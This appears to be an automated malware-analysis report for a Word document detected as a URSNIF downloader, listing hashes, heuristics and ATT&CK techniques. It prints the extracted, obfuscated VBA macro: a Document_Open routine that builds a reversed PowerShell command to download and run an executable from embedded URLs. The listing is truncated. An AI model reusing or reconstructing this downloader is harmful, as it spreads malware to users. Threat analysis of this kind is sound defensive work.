Office (OLE) malware analysis — malicious · 1a7eec8a3e3a9f95

MALICIOUS

Office (OLE)

70.0 KB Created: 2018-09-05 11:29:00 Authoring application: Microsoft Office Word First seen: 2018-10-07

MD5: bef2c11a004168b07dc8e3ca45030956 SHA-1: 9efb233729ad641d6a3a616f631976d365df4031 SHA-256: 1a7eec8a3e3a9f95b521ee66356e80b69a104e99637538ea0773f01b5ecabe6f

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

This Office document contains VBA macros, including a Document_Open macro, which is designed to execute code upon opening. The critical heuristic firing indicates the use of the Shell() function, which is likely used to download and execute a second-stage payload. The ClamAV detection further confirms the malicious nature of the file, identifying it as URSNIF.

Heuristics 5

ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4930 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4930 bytes
SHA-256: `84d2e9937c7e6b0b5661ed7c57dba7c2df642eab990e84cfc0ec13dff8d41be5`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "jSQvssMRHKUko" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On _ Error _ Resume _ Next Hour "427287058" + "396958911" VBA.Shell CleanString(aIi) + TaGoTmjSFkm + fMpZaLtYtNpTX + izLvIFB + HFCHsVdVvQK + XbCvihwtLDWzu + oOcKbuNAi, 16 - 16 Hour "vquiirCLiTiVD" + "zAiY" + "qNPvJaUc" + "cW" Hour "99855251" + "281460772" Hour "FaMR" + "1895" Hour "bED" + "kGXazsbj" End Sub Attribute VB_Name = "GUEvnqdiful" Function izLvIFB() On _ Error _ Resume _ Next Hour "dnZj" + "HcmNqYNXn" Hour "POVomdz" + "HQw" Hour "At" + "8299" + "156367564" + "JSVtC" Hour "OwD" + "448488717" Hour "pMEdpqoMGBtNjb" + "EwG" + "237" + "aBUn" XSqSYNhpLs = "cm" + "d " + "/V:ON/C" + Chr(5 + 0 + 4 + 3 + 22) + "^se" + "^t ^d^J" + "= " + "^ ^ " + "^" + " ^ " + " " + "^ " + "^ ^ " + "^ " Hour "VYStabTYTXthYL" + "OzdBARWjJzC" + "za" + "qlm" Hour "YXFC" + "695" PJGtli = "^ " + "}" + "}{hct^a" + "c^};^k" + "^ae" + "r" + "b^;c^" + "P^a$" + " ^me^t" + "^" Hour "25921645" + "327233615" Hour "v" + "8627" + "DVzEh" + "8685" Hour "jiFoijzXK" + "thw" WKNnNzZlGh = "I-e" + "kovnI" + ";)c" + "^P^a$" + "^ ^,^" + "u^az" + "$(^" + "e^l" + "^iF^d" + "a^o" + "^" + "lnw^o^" Hour "QQr" + "apuFswbsNtNbs" Hour "sbwjO" + "i" plzasqtFcB = "D" + ".P^" + "j" + "N$" + "{yr^" + "t{" + ")j^Ip$" + " ni^ ^" + "uaz" + "^" + "$(hca" Hour "507975329" + "ZCaK" + "OSIcjXz" + "FvhDKKHV" Hour "8855" + "k" zzHCOvGiv = "^e" + "r^" + "of;^" + "'ex" + "e.^" + "'+^ptv" + "^$+^'^\" Hour "kclwhJ" + "TuBipivS" Hour "2538" + "4136" + "mBjVVfM" + "w" Hour "AtzqkjFTw" + "sNC" + "8844" + "Hjuijrnq" zhQamADjcU = "^'+" + "c" + "^i^" + "lb" + "^u^p:" + "vn^e^$" + "=cPa" + "^$;^'" + "^" + "874^'" Hour "180259090" + "piz" + "fcjjwGsLa" + "k" Hour "YJKDODjAkzS" + "6360" qBlktI = " ^=^" + " ^ptv^" + "$^;)'^" + "@^" + "'(" + "^t^" + "i" + "l^p^S" Hour "wFztP" + "kLL" + "Jn" + "JVvPuz" Hour "70984245" + "oiYRZs" Hour "uZEbaQv" + "iQPI" + "tFaMUiCN" + "DubX" AZdDSoXFt = ".'^1^" + "9S" + "^A^x^" + "IH/" + "on^.^" Hour "qPPUDZUNK" + "336950012" + "4905" + "WKAC" Hour "8431" + "SpSp" + "93188920" + "jq" Hour "Gws" + "5898" + "izqZ" + "tfMNzR" sIdiqBJSDf = "s" + "y^a^w" + "//^" + ":" + "pt" Hour "3726" + "hLPUiwwMi" YtVzCXDzRh = "t^h^" + "@" + "N^" + "o" + "^O^4" + "/^moc" + "^.rasna" + "^" + "k^hs" + "^evak/" Hour "IANfJJDU" + "AlRtBVOjP" + "bsjonjOEzomZjV" + "n" Hour "SncYJkwwwt" + "qn" hOIWaQzUz = "/^:^p^" + "t^t" + "^h^@y" + "V^JV^H" + "^h" + "/^" + "m^o" + "c.flu" + "^gf" + "^al" + "a^k//:^" + "p^tt^h" izLvIFB = XSqSYNhpLs + PJGtli + WKNnNzZlGh + plzasqtFcB + zzHCOvGiv + zhQamADjcU + qBlktI + AZdDSoXFt + sIdiqBJSDf + YtVzCXDzRh + hOIWaQzUz Hour "411833087" + "zaOSwYXT" + "u" + "ipari" End Function Function HFCHsVdVvQK() On _ Error _ Resume _ Next Hour "omDOAubEU" + "m" Hour "ZzvF" + "jr" + "FwoNJ" + "JQWMakQPNJJZK" rhrsbb = "^@kn" + "^37^7^" + "X/moc" + "^.n^g" + "^i^" + "s^eda^t" + "^ic" + "ser" + "c//^" + ":^p" + "^t^t^h" + "@qk" + "/^" Hour "BCnd" + "zptd" Hour "VVb" + "uKllviVu" Hour "356220585" + "483940968" + "XQjQj" + "9860" Hour "JlzIz" + "179795829" UuKjEO = "moc.ecn" + "an^e" + "tni^" + "a^" + "m" + "es^" + "u^" + "o^h^la^" + "t^" + "ot^.^l" + "^ar" Hour "224131812" + "SWuc" Hour "511204006" + "504720858" Hour "fQMUBNi" + "Ikz" Hour "pTQbZ" + "kp" Hour "JZCP" + "scXXQzvcOwAq" Hour "91641517" + "Sn" + "bM" + "102371048" AOszQKcn = "^o^p" + "^m^e^t" + "//" + ":^pt" + "^t^h'=" + "^" + "j^I^p$;" Hour "hEUVHFUFFr" + "281941715" Hour "znOiXtaGJ" + "2598" Hour "191904866" + "2857" + "4468" + "250166105" XnSGPjiIc = "^tn^e" + "^i" + "lC^b^" + "e^W^." + "teN^" + " tc" + "^ejb^o" Hour "349372737" + "vVLX" Hour "QTiVW" + "I" Hour "SVNB" + "7174" + "RqHtouVOk" + "B" Xu ... (truncated)

SHA-256: 84d2e9937c7e6b0b5661ed7c57dba7c2df642eab990e84cfc0ec13dff8d41be5

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "jSQvssMRHKUko"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   Hour "427287058" + "396958911"
VBA.Shell CleanString(aIi) + TaGoTmjSFkm + fMpZaLtYtNpTX + izLvIFB + HFCHsVdVvQK + XbCvihwtLDWzu + oOcKbuNAi, 16 - 16
   Hour "vquiirCLiTiVD" + "zAiY" + "qNPvJaUc" + "cW"
   Hour "99855251" + "281460772"
   Hour "FaMR" + "1895"
   Hour "bED" + "kGXazsbj"
End Sub



Attribute VB_Name = "GUEvnqdiful"
Function izLvIFB()

On _
Error _
Resume _
Next
Hour "dnZj" + "HcmNqYNXn"
   Hour "POVomdz" + "HQw"
   Hour "At" + "8299" + "156367564" + "JSVtC"
   Hour "OwD" + "448488717"
   Hour "pMEdpqoMGBtNjb" + "EwG" + "237" + "aBUn"
XSqSYNhpLs = "cm" + "d " + "/V:ON/C" + Chr(5 + 0 + 4 + 3 + 22) + "^se" + "^t ^d^J" + "= " + "^  ^ " + "^" + " ^    " + " " + "^  " + "^ ^ " + "^  "
Hour "VYStabTYTXthYL" + "OzdBARWjJzC" + "za" + "qlm"
   Hour "YXFC" + "695"
PJGtli = "^ " + "}" + "}{hct^a" + "c^};^k" + "^ae" + "r" + "b^;c^" + "P^a$" + " ^me^t" + "^"
Hour "25921645" + "327233615"
   Hour "v" + "8627" + "DVzEh" + "8685"
   Hour "jiFoijzXK" + "thw"
WKNnNzZlGh = "I-e" + "kovnI" + ";)c" + "^P^a$" + "^ ^,^" + "u^az" + "$(^" + "e^l" + "^iF^d" + "a^o" + "^" + "lnw^o^"
Hour "QQr" + "apuFswbsNtNbs"
   Hour "sbwjO" + "i"
plzasqtFcB = "D" + ".P^" + "j" + "N$" + "{yr^" + "t{" + ")j^Ip$" + " ni^ ^" + "uaz" + "^" + "$(hca"
Hour "507975329" + "ZCaK" + "OSIcjXz" + "FvhDKKHV"
   Hour "8855" + "k"
zzHCOvGiv = "^e" + "r^" + "of;^" + "'ex" + "e.^" + "'+^ptv" + "^$+^'^\"
Hour "kclwhJ" + "TuBipivS"
   Hour "2538" + "4136" + "mBjVVfM" + "w"
   Hour "AtzqkjFTw" + "sNC" + "8844" + "Hjuijrnq"
zhQamADjcU = "^'+" + "c" + "^i^" + "lb" + "^u^p:" + "vn^e^$" + "=cPa" + "^$;^'" + "^" + "874^'"
Hour "180259090" + "piz" + "fcjjwGsLa" + "k"
   Hour "YJKDODjAkzS" + "6360"
qBlktI = " ^=^" + " ^ptv^" + "$^;)'^" + "@^" + "'(" + "^t^" + "i" + "l^p^S"
Hour "wFztP" + "kLL" + "Jn" + "JVvPuz"
   Hour "70984245" + "oiYRZs"
   Hour "uZEbaQv" + "iQPI" + "tFaMUiCN" + "DubX"
AZdDSoXFt = ".'^1^" + "9S" + "^A^x^" + "IH/" + "on^.^"
Hour "qPPUDZUNK" + "336950012" + "4905" + "WKAC"
   Hour "8431" + "SpSp" + "93188920" + "jq"
   Hour "Gws" + "5898" + "izqZ" + "tfMNzR"
sIdiqBJSDf = "s" + "y^a^w" + "//^" + ":" + "pt"
Hour "3726" + "hLPUiwwMi"
YtVzCXDzRh = "t^h^" + "@" + "N^" + "o" + "^O^4" + "/^moc" + "^.rasna" + "^" + "k^hs" + "^evak/"
Hour "IANfJJDU" + "AlRtBVOjP" + "bsjonjOEzomZjV" + "n"
   Hour "SncYJkwwwt" + "qn"
hOIWaQzUz = "/^:^p^" + "t^t" + "^h^@y" + "V^JV^H" + "^h" + "/^" + "m^o" + "c.flu" + "^gf" + "^al" + "a^k//:^" + "p^tt^h"
izLvIFB = XSqSYNhpLs + PJGtli + WKNnNzZlGh + plzasqtFcB + zzHCOvGiv + zhQamADjcU + qBlktI + AZdDSoXFt + sIdiqBJSDf + YtVzCXDzRh + hOIWaQzUz
   Hour "411833087" + "zaOSwYXT" + "u" + "ipari"
End Function
Function HFCHsVdVvQK()

On _
Error _
Resume _
Next
Hour "omDOAubEU" + "m"
   Hour "ZzvF" + "jr" + "FwoNJ" + "JQWMakQPNJJZK"
rhrsbb = "^@kn" + "^37^7^" + "X/moc" + "^.n^g" + "^i^" + "s^eda^t" + "^ic" + "ser" + "c//^" + ":^p" + "^t^t^h" + "@qk" + "/^"
Hour "BCnd" + "zptd"
   Hour "VVb" + "uKllviVu"
   Hour "356220585" + "483940968" + "XQjQj" + "9860"
   Hour "JlzIz" + "179795829"
UuKjEO = "moc.ecn" + "an^e" + "tni^" + "a^" + "m" + "es^" + "u^" + "o^h^la^" + "t^" + "ot^.^l" + "^ar"
Hour "224131812" + "SWuc"
   Hour "511204006" + "504720858"
   Hour "fQMUBNi" + "Ikz"
   Hour "pTQbZ" + "kp"
   Hour "JZCP" + "scXXQzvcOwAq"
   Hour "91641517" + "Sn" + "bM" + "102371048"
AOszQKcn = "^o^p" + "^m^e^t" + "//" + ":^pt" + "^t^h'=" + "^" + "j^I^p$;"
Hour "hEUVHFUFFr" + "281941715"
   Hour "znOiXtaGJ" + "2598"
   Hour "191904866" + "2857" + "4468" + "250166105"
XnSGPjiIc = "^tn^e" + "^i" + "lC^b^" + "e^W^." + "teN^" + " tc" + "^ejb^o"
Hour "349372737" + "vVLX"
   Hour "QTiVW" + "I"
   Hour "SVNB" + "7174" + "RqHtouVOk" + "B"
Xu
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.